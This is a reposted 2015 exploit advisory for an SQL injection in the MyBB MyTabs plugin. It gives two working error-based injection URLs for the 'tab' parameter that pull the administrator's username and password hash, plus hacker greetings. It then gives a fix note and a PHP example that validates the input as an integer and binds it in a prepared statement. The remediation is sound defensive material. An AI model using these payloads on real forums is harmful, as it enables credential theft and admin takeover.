MyBB 0day \ MyTabs (plugin) SQL injection flaw and fix

Source: 自学PHP网    Date: 2015-04-17 14:46

# Exploit title :  MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Vulnerable Software Link : http://mods.mybb.com/view/mytabs
 
Vulnerability :
 
$~ http://www.2cto.com /mybbpath/index.php?tab=[SQLi]
 
---------------------------------------
#           ~ Expl0itation ~            #
---------------------------------------
 
$~ Get the administrator's username (usually it has uid=1) ~
 
http://www.2cto.com /mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
$~ Get the administrator's password ~
 
http://www.2cto.com /mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -
 
 


Fix: filter the input to the tab parameter of the index.php page.
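
One way to apply that fix, as an added example that is not the plugin's own code: reject any `tab` value that is not a positive integer, then bind it as a typed parameter. The `mytabs` table, its columns and the function names are hypothetical, and an in-memory SQLite database stands in for the forum database.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for the plugin's tab table; the real schema is not shown on the page.
function make_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE mytabs (tid INTEGER PRIMARY KEY, name TEXT NOT NULL)');
    $pdo->exec("INSERT INTO mytabs (tid, name) VALUES (1, 'General'), (2, 'Support')");
    return $pdo;
}

// Layer 1: accept only a positive integer; anything else is rejected, not "cleaned".
function parse_tab_id($raw): ?int
{
    if (!is_string($raw)) {          // arrays from ?tab[]=... land here
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Layer 2: bind the value as a typed parameter so it never becomes SQL text.
function load_tab(PDO $pdo, $rawTab): ?array
{
    $id = parse_tab_id($rawTab);
    if ($id === null) {
        return null;                 // caller falls back to the default tab
    }
    $stmt = $pdo->prepare('SELECT tid, name FROM mytabs WHERE tid = :tid');
    $stmt->bindValue(':tid', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = make_demo_db();
// Constructed inputs: a valid id, a quote-breaking string, an array, zero, an unknown id.
foreach (['2', "1' and(select 1)-- -", ['1'], '0', '99'] as $input) {
    $row = load_tab($pdo, $input);
    printf("%-26s => %s\n", json_encode($input), $row ? $row['name'] : 'default tab');
}
```

In MyBB 1.8 the integer check in layer 1 corresponds to reading the parameter with `$mybb->get_input('tab', MyBB::INPUT_INT)`.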

# Greetz : Programer , Dr.moka, eragon, BaDBoY-AL , z3r0w1zard , Red Dragon_aL , Pretorian ,Th3_Power , R-t33n , Ace Wizard, KubaNnez1 , ssgodfather, DJDukli , b4ti , CroSs HackForums.AL members & All our friends.
